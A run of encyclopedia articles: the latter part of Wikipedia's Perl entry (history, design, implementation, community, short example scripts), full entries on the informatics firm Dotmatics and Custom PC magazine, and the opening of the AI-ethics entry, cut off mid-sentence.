of Perl that one wishes to emulate, allowing users to upgrade their version of Perl, but still run old scripts that would normally be incompatible. Perl 5.16 also updates the core to support Unicode 6.1. On May 18, 2013, Perl 5.18 was released. Notable new features include the new dtrace hooks, lexical subs, more CORE:: subs, overhaul of the hash for security reasons, support for Unicode 6.2. On May 27, 2014, Perl 5.20 was released. Notable new features include subroutine signatures, hash slices/new slice syntax, postfix dereferencing (experimental), Unicode 6.3, using consistent random number generator. Some observers credit the release of Perl 5.10 with the start of the Modern Perl movement. In particular, this phrase describes a style of development that embraces the use of the CPAN, takes advantage of recent developments in the language, and is rigorous about creating high quality code. While the book "Modern Perl" may be the most visible standard-bearer of this idea, other groups such as the Enlightened Perl Organization have taken up the cause. In late 2012 and 2013, several projects for alternative implementations for Perl 5 started: Perl5 in Perl6 by the Rakudo Perl team, by Stevan Little and friends, by the Perl11 team under Reini Urban, by , and , a Kickstarter project led by Will Braswell and affiliated with the Perll11 project. 2020 onward In June 2020, Perl 7 was announced as the successor to Perl 5. Perl 7 was to initially be based on Perl 5.32 with a release expected in first half of 2021, and release candidates sooner. This plan was revised in May 2021, without any release timeframe or version of Perl 5 for use as a baseline specified. When Perl 7 is released, Perl 5 will go into long term maintenance. Supported Perl 5 versions however will continue to get important security and bug fixes. Symbols Camel Programming Perl, published by O'Reilly Media, features a picture of a dromedary camel on the cover and is commonly called the "Camel Book". This image has become an unofficial symbol of Perl as well as a general hacker emblem, appearing on T-shirts and other clothing items. O'Reilly owns the image as a trademark but licenses it for non-commercial use, requiring only an acknowledgement and a link to www.perl.com. Licensing for commercial use is decided on a case-by-case basis. O'Reilly also provides "Programming Republic of Perl" logos for non-commercial sites and "Powered by Perl" buttons for any site that uses Perl. Onion The Perl Foundation owns an alternative symbol, an onion, which it licenses to its subsidiaries, Perl Mongers, PerlMonks, Perl.org, and others. The symbol is a visual pun on pearl onion. Raptor Sebastian Riedel, the creator of Mojolicious, created a logo depicting a raptor dinosaur, which is available under a CC-SA License, Version 4.0. The analogue of the raptor comes from a series of talks given by Matt S Trout beginning in 2010. Overview According to Wall, Perl has two slogans. The first is "There's more than one way to do it," commonly known as TMTOWTDI. The second slogan is "Easy things should be easy and hard things should be possible". Features The overall structure of Perl derives broadly from C. Perl is procedural in nature, with variables, expressions, assignment statements, brace-delimited blocks, control structures, and subroutines. Perl also takes features from shell programming. All variables are marked with leading sigils, which allow variables to be interpolated directly into strings. However, unlike the shell, Perl uses sigils on all accesses to variables, and unlike most other programming languages that use sigils, the sigil doesn't denote the type of the variable but the type of the expression. So for example, while an array is denoted by the sigil "@" (for example @arrayname), an individual member of the array is denoted by the scalar sigil "$" (for example $arrayname[3]). Perl also has many built-in functions that provide tools often used in shell programming (although many of these tools are implemented by programs external to the shell) such as sorting, and calling operating system facilities. Perl takes hashes ("associative arrays") from AWK and regular expressions from sed. These simplify many parsing, text-handling, and data-management tasks. Shared with Lisp is the implicit return of the last value in a block, and all statements are also expressions which can be used in larger expressions themselves. Perl 5 added features that support complex data structures, first-class functions (that is, closures as values), and an object-oriented programming model. These include references, packages, class-based method dispatch, and lexically scoped variables, along with compiler directives (for example, the strict pragma). A major additional feature introduced with Perl 5 was the ability to package code as reusable modules. Wall later stated that "The whole intent of Perl 5's module system was to encourage the growth of Perl culture rather than the Perl core." All versions of Perl do automatic data-typing and automatic memory management. The interpreter knows the type and storage requirements of every data object in the program; it allocates and frees storage for them as necessary using reference counting (so it cannot deallocate circular data structures without manual intervention). Legal type conversions — for example, conversions from number to string — are done automatically at run time; illegal type conversions are fatal errors. Design The design of Perl can be understood as a response to three broad trends in the computer industry: falling hardware costs, rising labor costs, and improvements in compiler technology. Many earlier computer languages, such as Fortran and C, aimed to make efficient use of expensive computer hardware. In contrast, Perl was designed so that computer programmers could write programs more quickly and easily. Perl has many features that ease the task of the programmer at the expense of greater CPU and memory requirements. These include automatic memory management; dynamic typing; strings, lists, and hashes; regular expressions; introspection; and an eval() function. Perl follows the theory of "no built-in limits," an idea similar to the Zero One Infinity rule. Wall was trained as a linguist, and the design of Perl is very much informed by linguistic principles. Examples include Huffman coding (common constructions should be short), good end-weighting (the important information should come first), and a large collection of language primitives. Perl favors language constructs that are concise and natural for humans to write, even where they complicate the Perl interpreter. Perl's syntax reflects the idea that "things that are different should look different." For example, scalars, arrays, and hashes have different leading sigils. Array indices and hash keys use different kinds of braces. Strings and regular expressions have different standard delimiters. This approach can be contrasted with a language such as Lisp, where the same basic syntax, composed of simple and universal symbolic expressions, is used for all purposes. Perl does not enforce any particular programming paradigm (procedural, object-oriented, functional, or others) or even require the programmer to choose among them. There is a broad practical bent to both the Perl language and the community and culture that surround it. The preface to Programming Perl begins: "Perl is a language for getting your job done." One consequence of this is that Perl is not a tidy language. It includes many features, tolerates exceptions to its rules, and employs heuristics to resolve syntactical ambiguities. Because of the forgiving nature of the compiler, bugs can sometimes be hard to find. Perl's function documentation remarks on the variant behavior of built-in functions in list and scalar contexts by saying, "In general, they do what you want, unless you want consistency." No written specification or standard for the Perl language exists for Perl versions through Perl 5, and there are no plans to create one for the current version of Perl. There has been only one implementation of the interpreter, and the language has evolved along with it. That interpreter, together with its functional tests, stands as a de facto specification of the language. Perl 6, however, started with a specification, and several projects aim to implement some or all of the specification. Applications Perl has many and varied applications, compounded by the availability of many standard and third-party modules. Perl has chiefly been used to write CGI scripts: large projects written in Perl include cPanel, Slash, Bugzilla, RT, TWiki, and Movable Type; high-traffic websites that use Perl extensively include Priceline.com, Craigslist, IMDb, LiveJournal, DuckDuckGo, Slashdot and Ticketmaster. It is also an optional component of the popular LAMP technology stack for Web development, in lieu of PHP or Python. Perl is used extensively as a system programming language in the Debian Linux distribution. Perl is often used as a glue language, tying together systems and interfaces that were not specifically designed to interoperate, and for "data munging," that is, converting or processing large amounts of data for tasks such as creating reports. In fact, these strengths are intimately linked. The combination makes Perl a popular all-purpose language for system administrators, particularly because short programs, often called "one-liner programs," can be entered and run on a single command line. Perl code can be made portable across Windows and Unix; such code is often used by suppliers of software (both COTS and bespoke) to simplify packaging and maintenance of software build- and deployment-scripts. Perl/Tk and wxPerl are commonly used to add graphical user interfaces to Perl scripts. Implementation Perl is implemented as a core interpreter, written in C, together with a large collection of modules, written in Perl and C. , the interpreter is 150,000 lines of C code and compiles to a 1 MB executable on typical machine architectures. Alternatively, the interpreter can be compiled to a link library and embedded in other programs. There are nearly 500 modules in the distribution, comprising 200,000 lines of Perl and an additional 350,000 lines of C code (much of the C code in the modules consists of character encoding tables). The interpreter has an object-oriented architecture. All of the elements of the Perl language—scalars, arrays, hashes, coderefs, file handles—are represented in the interpreter by C structs. Operations on these structs are defined by a large collection of macros, typedefs, and functions; these constitute the Perl C API. The Perl API can be bewildering to the uninitiated, but its entry points follow a consistent naming scheme, which provides guidance to those who use it. The life of a Perl interpreter divides broadly into a compile phase and a run phase. In Perl, the phases are the major stages in the interpreter's life-cycle. Each interpreter goes through each phase only once, and the phases follow in a fixed sequence. Most of what happens in Perl's compile phase is compilation, and most of what happens in Perl's run phase is execution, but there are significant exceptions. Perl makes important use of its capability to execute Perl code during the compile phase. Perl will also delay compilation into the run phase. The terms that indicate the kind of processing that is actually occurring at any moment are compile time and run time. Perl is in compile time at most points during the compile phase, but compile time may also be entered during the run phase. The compile time for code in a string argument passed to the eval built-in occurs during the run phase. Perl is often in run time during the compile phase and spends most of the run phase in run time. Code in BEGIN blocks executes at run time but in the compile phase. At compile time, the interpreter parses Perl code into a syntax tree. At run time, it executes the program by walking the tree. Text is parsed only once, and the syntax tree is subject to optimization before it is executed, so that execution is relatively efficient. Compile-time optimizations on the syntax tree include constant folding and context propagation, but peephole optimization is also performed. Perl has a Turing-complete grammar because parsing can be affected by run-time code executed during the compile phase. Therefore, Perl cannot be parsed by a straight Lex/Yacc lexer/parser combination. Instead, the interpreter implements its own lexer, which coordinates with a modified GNU bison parser to resolve ambiguities in the language. It is often said that "Only perl can parse Perl," meaning that only the Perl interpreter (perl) can parse the Perl language (Perl), but even this is not, in general, true. Because the Perl interpreter can simulate a Turing machine during its compile phase, it would need to decide the halting problem in order to complete parsing in every case. It is a longstanding result that the halting problem is undecidable, and therefore not even perl can always parse Perl. Perl makes the unusual choice of giving the user access to its full programming power in its own compile phase. The cost in terms of theoretical purity is high, but practical inconvenience seems to be rare. Other programs that undertake to parse Perl, such as source-code analyzers and auto-indenters, have to contend not only with ambiguous syntactic constructs but also with the undecidability of Perl parsing in the general case. Adam Kennedy's PPI project focused on parsing Perl code as a document (retaining its integrity as a document), instead of parsing Perl as executable code (that not even Perl itself can always do). It was Kennedy who first conjectured that "parsing Perl suffers from the 'halting problem'," which was later proved. Perl is distributed with over 250,000 functional tests for core Perl language and over 250,000 functional tests for core modules. These run as part of the normal build process and extensively exercise the interpreter and its core modules. Perl developers rely on the functional tests to ensure that changes to the interpreter do not introduce software bugs; additionally, Perl users who see that the interpreter passes its functional tests on their system can have a high degree of confidence that it is working properly. Availability Perl is dual licensed under both the Artistic License 1.0 and the GNU General Public License. Distributions are available for most operating systems. It is particularly prevalent on Unix and Unix-like systems, but it has been ported to most modern (and many obsolete) platforms. With only six reported exceptions, Perl can be compiled from source code on all POSIX-compliant, or otherwise-Unix-compatible, platforms. Because of unusual changes required for the classic Mac OS environment, a special port called MacPerl was shipped independently. The Comprehensive Perl Archive Network carries a complete list of supported platforms with links to the distributions available on each. CPAN is also the source for publicly available Perl modules that are not part of the core Perl distribution. Windows Users of Microsoft Windows typically install one of the native binary distributions of Perl for Win32, most commonly Strawberry Perl or ActivePerl. Compiling Perl from source code under Windows is possible, but most installations lack the requisite C compiler and build tools. This also makes it difficult to install modules from the CPAN, particularly those that are partially written in C. ActivePerl is a closed-source distribution from ActiveState that has regular releases that track the core Perl releases. The distribution previously included the Perl package manager (PPM), a popular tool for installing, removing, upgrading, and managing the use of common Perl modules; however, this tool was discontinued as of ActivePerl 5.28. Included also is PerlScript, a Windows Script Host (WSH) engine implementing the Perl language. Visual Perl is an ActiveState tool that adds Perl to the Visual Studio .NET development suite. A VBScript-to-Perl converter, as well as a Perl compiler for Windows, and converters of awk and sed to Perl have also been produced by this company and included on the ActiveState CD for Windows, which includes all of their distributions plus the Komodo IDE and all but the first on the Unix/Linux/Posix variant thereof in 2002 and subsequently. Strawberry Perl is an open-source distribution for Windows. It has had regular, quarterly releases since January 2008, including new modules as feedback and requests come in. Strawberry Perl aims to be able to install modules like standard Perl distributions on other platforms, including compiling XS modules. The Cygwin emulation layer is another way of running Perl under Windows. Cygwin provides a Unix-like environment on Windows, and both Perl and CPAN are available as standard pre-compiled packages in the Cygwin setup program. Since Cygwin also includes gcc, compiling Perl from source is also possible. A perl executable is included in several Windows Resource kits in the directory with other scripting tools. Implementations of Perl come with the MKS Toolkit, Interix (the base of earlier implementations of Windows Services for Unix), and UWIN. Database interfaces Perl's text-handling capabilities can be used for generating SQL queries; arrays, hashes, and automatic memory management make it easy to collect and process the returned data. For example, in Tim Bunce's Perl DBI application programming interface (API), the arguments to the API can be the text of SQL queries; thus it is possible to program in multiple languages at the same time (e.g., for generating a Web page using HTML, JavaScript, and SQL in a here document). The use of Perl variable interpolation to programmatically customize each of the SQL queries, and the specification of Perl arrays or hashes as the structures to programmatically hold the resulting data sets from each SQL query, allows a high-level mechanism for handling large amounts of data for post-processing by a Perl subprogram. In early versions of Perl, database interfaces were created by relinking the interpreter with a client-side database library. This was sufficiently difficult that it was done for only a few of the most-important and most widely used databases, and it restricted the resulting perl executable to using just one database interface at a time. In Perl 5, database interfaces are implemented by Perl DBI modules. The DBI (Database Interface) module presents a single, database-independent interface to Perl applications, while the DBD (Database Driver) modules handle the details of accessing some 50 different databases; there are DBD drivers for most ANSI SQL databases. DBI provides caching for database handles and queries, which can greatly improve performance in long-lived execution environments such as mod perl, helping high-volume systems avert load spikes as in the Slashdot effect. In modern Perl applications, especially those written using web frameworks such as Catalyst, the DBI module is often used indirectly via object-relational mappers such as DBIx::Class, Class::DBI or Rose::DB::Object that generate SQL queries and handle data transparently to the application author. Comparative performance The Computer Language Benchmarks Game compares the performance of implementations of typical programming problems in several programming languages. The submitted Perl implementations typically perform toward the high end of the memory-usage spectrum and give varied speed results. Perl's performance in the benchmarks game is typical for interpreted languages. Large Perl programs start more slowly than similar programs in compiled languages because perl has to compile the source every time it runs. In a talk at the YAPC::Europe 2005 conference and subsequent article "A Timely Start," Jean-Louis Leroy found that his Perl programs took much longer to run than expected because the perl interpreter spent significant time finding modules within his over-large include path. Unlike Java, Python, and Ruby, Perl has only experimental support for pre-compiling. Therefore, Perl programs pay this overhead penalty on every execution. The run phase of typical programs is long enough that amortized startup time is not substantial, but benchmarks that measure very short execution times are likely to be skewed due to this overhead. A number of tools have been introduced to improve this situation. The first such tool was Apache's mod perl, which sought to address one of the most-common reasons that small Perl programs were invoked rapidly: CGI Web development. ActivePerl, via Microsoft ISAPI, provides similar performance improvements. Once Perl code is compiled, there is additional overhead during the execution phase that typically isn't present for programs written in compiled languages such as C or C++. Examples of such overhead include bytecode interpretation, reference-counting memory management, and dynamic type-checking. Optimizing The most critical routines can be written in other languages (such as C), which can be connected to Perl via simple Inline modules or the more complex, but flexible, XS mechanism. Perl 5 Perl 5, the language usually referred to as "Perl", continues to be actively developed. Perl 5.12.0 was released in April 2010 with some new features influenced by the design of Perl 6, followed by Perl 5.14.1 (released on June 17, 2011), Perl 5.16.1 (released on August 9, 2012.), and Perl 5.18.0 (released on May 18, 2013). Perl 5 development versions are released on a monthly basis, with major releases coming out once per year. The relative proportion of Internet searches for "Perl programming", as compared with similar searches for other programming languages, steadily declined from about 10% in 2005 to about 2% in 2011, to about 0.7% in 2020. Raku (Perl 6) At the 2000 Perl Conference, Jon Orwant made a case for a major new language-initiative. This led to a decision to begin work on a redesign of the language, to be called Perl 6. Proposals for new language features were solicited from the Perl community at large, which submitted more than 300 RFCs. Wall spent the next few years digesting the RFCs and synthesizing them into a coherent framework for Perl 6. He presented his design for Perl 6 in a series of documents called "apocalypses"numbered to correspond to chapters in Programming Perl. , the developing specification of Perl 6 was encapsulated in design documents called Synopsesnumbered to correspond to Apocalypses. Thesis work by Bradley M. Kuhn, overseen by Wall, considered the possible use of the Java virtual machine as a runtime for Perl. Kuhn's thesis showed this approach to be problematic. In 2001, it was decided that Perl 6 would run on a cross-language virtual machine called Parrot. This will mean that other languages targeting the Parrot will gain native access to CPAN, allowing some level of cross-language development. In 2005, Audrey Tang created the Pugs project, an implementation of Perl 6 in Haskell. This acted as, and continues to act as, a test platform for the Perl 6 language (separate from the development of the actual implementation)allowing the language designers to explore. The Pugs project spawned an active Perl/Haskell cross-language community centered around the Libera Chat #raku IRC channel. Many functional programming influences were absorbed by the Perl 6 design team. In 2012, Perl 6 development was centered primarily on two compilers: Rakudo, an implementation running on the Parrot virtual machine and the Java virtual machine. Niecza, which targets the Common Language Runtime. In 2013, MoarVM (“Metamodel On A Runtime”), a C language-based virtual machine designed primarily for Rakudo was announced. In October 2019, Perl 6 was renamed to Raku. only the Rakudo implementation and MoarVM are under active development, and other virtual machines, such as the Java Virtual Machine and JavaScript, are supported. Perl 7 Perl 7 was announced on 24 June 2020 at "The Perl Conference in the Cloud" as the successor to Perl 5. Based on Perl 5.32, Perl 7 is designed to be backward compatible with modern Perl 5 code; Perl 5 code, without boilerplate (pragma) header needs adding use compat::perl5; to stay compatible, but modern code can drop some of the boilerplate. Perl community Perl's culture and community has developed alongside the language itself. Usenet was the first public venue in which Perl was introduced, but over the course of its evolution, Perl's community was shaped by the growth of broadening Internet-based services including the introduction of the World Wide Web. The community that surrounds Perl was, in fact, the topic of Wall's first "State of the Onion" talk. State of the Onion State of the Onion is the name for Wall's yearly keynote-style summaries on the progress of Perl and its community. They are characterized by his hallmark humor, employing references to Perl's culture, the wider hacker culture, Wall's linguistic background, sometimes his family life, and occasionally even his Christian background. Each talk is first given at various Perl conferences and is eventually also published online. Perl pastimes JAPHs In email, Usenet, and message board postings, "Just another Perl hacker" (JAPH) programs are a common trend, originated by Randal L. Schwartz, one of the earliest professional Perl trainers. In the parlance of Perl culture, Perl programmers are known as Perl hackers, and from this derives the practice of writing short programs to print out the phrase "Just another Perl hacker". In the spirit of the original concept, these programs are moderately obfuscated and short enough to fit into the signature of an email or Usenet message. The "canonical" JAPH as developed by Schwartz includes the comma at the end, although this is often omitted. Perl golf Perl "golf" is the pastime of reducing the number of characters (key "strokes") used in a Perl program to the bare minimum, much in the same way that golf players seek to take as few shots as possible in a round. The phrase's first use emphasized the difference between pedestrian code meant to teach a newcomer and terse hacks likely to amuse experienced Perl programmers, an example of the latter being JAPHs that were already used in signatures in Usenet postings and elsewhere. Similar stunts had been an unnamed pastime in the language APL in previous decades. The use of Perl to write a program that performed RSA encryption prompted a widespread and practical interest in this pastime. In subsequent years, the term "code golf" has been applied to the pastime in other languages. A Perl Golf Apocalypse was held at Perl Conference 4.0 in Monterey, California in July 2000. Obfuscation As with C, obfuscated code competitions were a well known pastime in the late 1990s. The Obfuscated Perl Contest was a competition held by The Perl Journal from 1996 to 2000 that made an arch virtue of Perl's syntactic flexibility. Awards were given for categories such as "most powerful"—programs that made efficient use of space—and "best four-line signature" for programs that fit into four lines of 76 characters in the style of a Usenet signature block. Poetry Perl poetry is the practice of writing poems that can be compiled as legal Perl code, for example the piece known as Black Perl. Perl poetry is made possible by the large number of English words that are used in the Perl language. New poems are regularly submitted to the community at PerlMonks. Perl on IRC A number of IRC channels offer support for Perl and some of its modules. CPAN Acme There are also many examples of code written purely for entertainment on the CPAN. Lingua::Romana::Perligata, for example, allows writing programs in Latin. Upon execution of such a program, the module translates its source code into regular Perl and runs it. The Perl community has set aside the "Acme" namespace for modules that are fun in nature (but its scope has widened to include exploratory or experimental code or any other module that is not meant to ever be used in production). Some of the Acme modules are deliberately implemented in amusing ways. This includes Acme::Bleach, one of the first modules in the Acme:: namespace, which allows the program's source code to be "whitened" (i.e., all characters replaced with whitespace) and yet still work. Example code In older versions of Perl, one would write the Hello World program as: print "Hello, World!\n"; Here is a more complex Perl program, that counts down seconds from a given starting value: #!/usr/bin/perl use strict; use warnings; my ( $remaining, $total ); $remaining = $total = shift(@ARGV); STDOUT->autoflush(1); while ( $remaining ) { printf ( "Remaining %s/%s \r", $remaining--, $total ); sleep 1; } print "\n"; The perl interpreter can also be used for one-off scripts on the command line. The following example (as invoked from an sh-compatible shell, such as Bash) translates the string "Bob" in all files ending with .txt in the current directory to "Robert": $ perl -i.bak -lp -e 's/Bob/Robert/g' *.txt Criticism Perl has been referred to as "line noise" and a write-only language by its critics. The earliest such mention was in the first edition of the book Learning Perl, a Perl 4 tutorial book written by Randal L. Schwartz, in the first chapter of which he states: "Yes, sometimes Perl looks like line noise to the uninitiated, but to the seasoned Perl programmer, it looks like checksummed line noise with a mission in life." He also stated that the accusation that Perl is a write-only language could be avoided by coding with "proper care". The Perl overview document states that the names of built-in "magic" scalar variables "look like punctuation or line noise". However, the English module provides both long and short English alternatives. document states that line noise in regular expressions could be mitigated using the /x modifier to add whitespace. According to the Perl 6 FAQ, Perl 6 was designed to mitigate "the usual suspects" that elicit the "line noise" claim from Perl 5 critics, including the removal of "the majority of the punctuation variables" and the sanitization of the regex syntax. The Perl 6 FAQ also states that what is sometimes referred to as Perl's line noise is "the actual syntax of the language" just as gerunds and prepositions are a part of the English language. In a December 2012 blog posting, despite claiming that "Rakudo Perl 6 has failed and will continue to fail unless it gets some adult supervision", chromatic stated that the design of Perl 6 has a "well-defined grammar" as well as an "improved type system, a unified object system with an intelligent metamodel, metaoperators, and a clearer system of context that provides for such niceties as pervasive laziness". He also stated that "Perl 6 has a coherence and a consistency that Perl 5 lacks." See also Outline of Perl Perl Data Language Perl Object Environment Plain Old Documentation References Further reading Learning Perl 6th Edition (2011), O'Reilly. Beginner-level introduction to Perl. Beginning Perl 1st Edition (2012), Wrox. A beginner's tutorial for those new to programming or just new to Perl. Modern Perl 2nd Edition (2012), Onyx Neon. Describes Modern Perl programming techniques. Programming Perl 4th Edition (2012), O'Reilly. The definitive Perl reference. Effective Perl Programming 2nd Edition (2010), Addison-Wesley. Intermediate- to advanced-level guide to writing idiomatic Perl. Perl Cookbook, . Practical Perl programming examples. Functional programming techniques in Perl. External links American inventions Programming languages C programming language family Cross-platform software Dynamic programming languages Dynamically typed programming languages Free compilers and interpreters Free software programmed in C High-level programming languages Multi-paradigm programming languages Object-oriented programming languages Procedural programming languages Programming languages created in 1987 Scripting languages Software using the Artistic license Text-oriented programming languages Unix programming tools Articles with example Perl code
35187583
https://en.wikipedia.org/wiki/Dotmatics
Dotmatics
Dotmatics is a scientific informatics company, focusing on data management, analysis and visualization. Founded in 2005, the company's central headquarters are in Bishops Stortford, Hertfordshire, England and has two US offices in San Diego, CA and Boston, MA. Dotmatics provides software to half of the world's 20 largest drugmakers. History Dotmatics' origins trace back to Merck Sharp and Dohme, a multinational pharmaceutical company, where, in the early 2000s, Merck staff developed what later became Dotmatics' browser and gateway software. Dotmatics Limited was founded in 2005 as a spin-out when Merck closed the site. The company was established with the intent to address the information needs of scientists in the biotech/pharma space. Nov. 2006: Incorporate Astex Therapeutics' chemical structure searching software as the product pinpoint. Oct. 2007: Headquarters moved to new premises in Bishops Stortford, United Kingdom. March 2009: Opened West Coast US office in Biotech Beach area of San Diego. Oct. 2009: Launched in Japanese market via Tokyo-based Infocom Corporation. April 2010: Opened East Coast US office in Boston Massachusetts. April 2010: Launched web-based Studies Notebook, for Windows, Mac, and Linux. Dec. 2010: Headquarters moved to expanded premises. March 2011, Studies Notebook integrated Lexichem chemical naming from OpenEye Scientific Software, to automate name-to-structure and structure-to-name conversions in English and foreign languages. April 2011: Elemental web-based structure drawing tool included in ChemSpider, the Royal Society of Chemistry's community website. Sept. 2011: Move East Coast office from Boston's financial district to Woburn MA. Oct 2017: Significant investment by Scottish Equity Partners June 2020: BioBright acquired diversifying into Laboratory Automation technology. July 2020: 2019 Revenue is over £26M Software and use Dotmatics develops web-based tools for querying, browsing, managing, and sharing scientific data and documents. Browser, a web-based tool for "chemically-aware" querying and browsing biological and chemical datasets, analysis of plate-based data, upload of data sets from Microsoft Excel; and registration. Vortex for visualizing and data-mining biological and chemical information. Vortex provides structure-based searching, together with physiochemical property calculations. Pinpoint, an Oracle-based tool for querying and integrating chemical databases. Gateway, a document management system and collaboration tool. Nucleus, a web-based tool for importing, mapping, and storing data from existing sources. Register, a web-based tool for single and batch chemical compound registration. Bioregister, for registering biological entities (protein and nucleotide sequences), as well as their clone vector, purification and expression information. Studies is a screening data management tool that allows creation, capture, analysis, and storage of chemical, biological, and ad hoc research data. Studies notebook, a Web-based Electronic lab notebook that supports chemistry, biology, and ad hoc research. It combines a web-based platform with intellectual property protection tools. Elemental, a web-based structure drawing tool for drawing simple chemical structures or complex structure queries directly within a webpage. Also available as an iOS app. Cascade, a Web-based workflow management tool that controls workflow among different departments using the Electronic lab notebook. Dotmatics for Office (D4O) makes Microsoft™ Office® applications such as Excel®, PowerPoint®, Word and Outlook® chemically aware. Chemselector manages very large chemistry datasets with fast search and trivially simple maintenance/update. It has a modern user interface focused on browsing and filtering for molecule, reagent and sample selection. The available eMolecules+ for Chemselector dataset provides access to highly curated eMolecules sourcing data. Inventory is a fully searchable sample and materials inventory that tracks chemicals, biologics, instruments and associated data across a hierarchy of locations and manages the dispensing and plating workflows, as samples are moved through an R&D process. Spaces allows project members within distributed research teams to collaborate using scientific teamboards that organize their research data and design ideas. Reaction Workflows, a graphical environment that enables scientists to build and execute data processing workflows to perform common cheminformatics tasks, such as library enumeration, structure normalization and compound profiling. The Informatics Suite is all the software packaged into one integrated suite. See also Cheminformatics Bioinformatics Business intelligence tools Electronic lab notebook Visual analytics Life Sciences Laboratory informatics References External links Staff listing - LinkedIn Cheminformatics
1971847
https://en.wikipedia.org/wiki/Custom%20PC%20%28magazine%29
Custom PC (magazine)
Custom PC (usually abbreviated to 'CPC') is a UK-based computer magazine created by Mr Freelance Limited, and originally published by Dennis Publishing Ltd. It's aimed at PC hardware enthusiasts, covering topics such as modding, overclocking, and PC gaming. The first issue was released in October 2003 and it is published monthly. Audited circulation figures are 9,428 (ABC, Jan–Dec 2014). Gareth Ogden retired as editor of Custom PC at the end of Issue 52. Issue 53 was edited by Deputy Editor James Gorbold; from Issue 54 onwards the magazine was edited by Alex Watson. From Issue 87 to Issue 102 the magazine was edited by James Gorbold. From Issue 103 onward, the magazine has been edited by Ben Hardwidge. Between 2009 and January 2012, the magazine was partnered with enthusiast site bit-tech.net, with the two editorial teams merging and sharing resources across both the site and the magazine. Custom PCs James Gorbold took over as Group Editor of the two teams. However, since February 2012, the two brands have separated and content is no longer shared between the two publications, although many of the magazine's writers continue to write for bit-tech. In February 2019 the magazine, along with Digital SLR Photography Magazine, was sold to Raspberry Pi Trading, a subsidiary of the Raspberry Pi Foundation. Sections The magazine includes reviews, features, tutorials, analysis columns and sections devoted to magazine readers. The most current regular sections includes: From the EditorIntroductory column by the editor Ben Hardwidge Tracy KingSceptical analysis of the ways in which technology and gaming are presented in the media Richard SwinburneAnalysis of hardware trends in Taiwan Hobby TechTips, tricks and news about computer hobbyism, including Raspberry Pi, Arduino and retro computing, by Gareth Halfacree Folding@Custom PCCustom PC encourages readers to use their idle computers for the purpose of scientific research – Folding@home is a program created and run by Stanford University that uses spare processor cycles to simulate protein folding for disease research. Each month the magazine features a league table of their top folders, the 'Custom PC & bit-tech' team is currently ranked number 6 worldwide. One random folder receives an item of PC hardware each month (stopped in 2010), while the top folder that month is noted in the 'Folder of the month' section. CPC EliteA 10-page section of CPC's latest recommendations for the best hardware in several categories (motherboards, processors, cases etc.). Reviews CPC Magazine review the latest hardware and software (including games), they rate the product with their own rating system, and CPC give their stamp of approval (including a Premium Grade award for excellent products) to any product that they feel excels in its particular category. While hardware reviews are the focus of the magazine, games reviews are included. Custom Kit2 pages of short reviews of computer gadgets and accessories. Lab TestEach month CPC tests related hardware from different manufacturers / different specifications (such as graphics cards or hard-drives) comparing them to discern the best choice. The tests include extensive benchmark comparison tables. Unlike most computer magazines, CPC doesn't do price point labs tests. Instead each item is awarded a value score that reflects whether the item is worth the asking price. GamesReviews of the latest games plus graphical comparison guides that show the difference made by different graphical settings. Inverse LookOpinion and analysis of PC gaming, by Rick Lane FeaturesSeveral in-depth articles on computer-related topics (normally 2 per issue) Customised PCTwo-page column dedicated to modding, water-cooling and PC customisation, by Antony Leather How To5 pages of step-by-step tutorials written by Antony Leather. Readers' DrivesReaders of the magazine get the chance to show off their computer modification skills. Each month a different reader is photographed with his rig and answers questions on its specification and how it was constructed. Featured modders win a prize pack of assorted computer hardware. James GorboldThe back page column is written by previous editor, James Gorbold, who now works for Scan Computers. Subscriber edition Anyone who subscribes currently receives a free tool kit or another freebie such as a custompc mug or recently (28 January 2011) a Muc-off Screen Cleaning Rescue Kit, targeted at computer maintenance. Subscribers receive a Special Subscriber Edition which features exclusive artwork (usually the "flat-out coolest" photo from the cover shoot, according to Alex Watson). Editorial team List of the editorial staff as of Issue 187 (April 2019). Publishing Director:- Russell BarnesEditor:- Ben HardwidgeModding Editor:- Antony LeatherGames Editor:- Rick LaneArt Editor:- Bill BagnallProduction Editor:- Julie BirrellRegular Contributors:- Edward Chester, Mike Jennings, James Gorbold, Gareth Halfacree, Phil Hartup, Tracy King, Richard SwinburnePhotography:- Antony Leather, Gareth Halfacree, Henry Carter, Mike JenningsRegular Art & Production Contributors''':- Magic Torch, Mike Harding Printing / distribution Printed by:- BGP. Cover printed by:- Ancient House. Distributed by:- Seymour Distribution See also Maximum PC'' – American magazine with same focus External links Custom PC website Custom PC RealBench 2015 Benchmark Suite References Home computer magazines Computer magazines published in the United Kingdom Video game magazines published in the United Kingdom Monthly magazines published in the United Kingdom Magazines established in 2003 2003 establishments in the United Kingdom
13659583
https://en.wikipedia.org/wiki/Ethics%20of%20artificial%20intelligence
Ethics of artificial intelligence
The ethics of artificial intelligence is the branch of the ethics of technology specific to artificially intelligent systems. It is sometimes divided into a concern with the moral behavior of humans as they design, make, use and treat artificially intelligent systems, and a concern with the behavior of machines, in machine ethics. It also includes the issue of a possible singularity due to superintelligent AI. Ethics fields' approaches Robot ethics The term "robot ethics" (sometimes "roboethics") refers to the morality of how humans design, construct, use and treat robots. Robot ethics intersect with the ethics of AI. Robots are physical machines whereas AI can be only software. Not all robots function through AI systems and not all AI systems are robots. Robot ethics considers how machines may be used to harm or benefit humans, their impact on individual autonomy, and their effects on social justice. Machine ethics Machine ethics (or machine morality) is the field of research concerned with designing Artificial Moral Agents (AMAs), robots or artificially intelligent computers that behave morally or as though moral. To account for the nature of these agents, it has been suggested to consider certain philosophical ideas, like the standard characterizations of agency, rational agency, moral agency, and artificial agency, which are related to the concept of AMAs. Isaac Asimov considered the issue in the 1950s in his I, Robot. At the insistence of his editor John W. Campbell Jr., he proposed the Three Laws of Robotics to govern artificially intelligent systems. Much of his work was then spent testing the boundaries of his three laws to see where they would break down, or where they would create paradoxical or unanticipated behavior. His work suggests that no set of fixed laws can sufficiently anticipate all possible circumstances. More recently, academics and many governments have challenged the idea that AI can itself be held accountable. A panel convened by the United Kingdom in 2010 revised Asimov's laws to clarify that AI is the responsibility either of its manufacturers, or of its owner/operator. In 2009, during an experiment at the Laboratory of Intelligent Systems in the Ecole Polytechnique Fédérale of Lausanne in Switzerland, robots that were programmed to cooperate with each other (in searching out a beneficial resource and avoiding a poisonous one) eventually learned to lie to each other in an attempt to hoard the beneficial resource. Some experts and academics have questioned the use of robots for military combat, especially when such robots are given some degree of autonomous functions. The US Navy has funded a report which indicates that as military robots become more complex, there should be greater attention to implications of their ability to make autonomous decisions. The President of the Association for the Advancement of Artificial Intelligence has commissioned a study to look at this issue. They point to programs like the Language 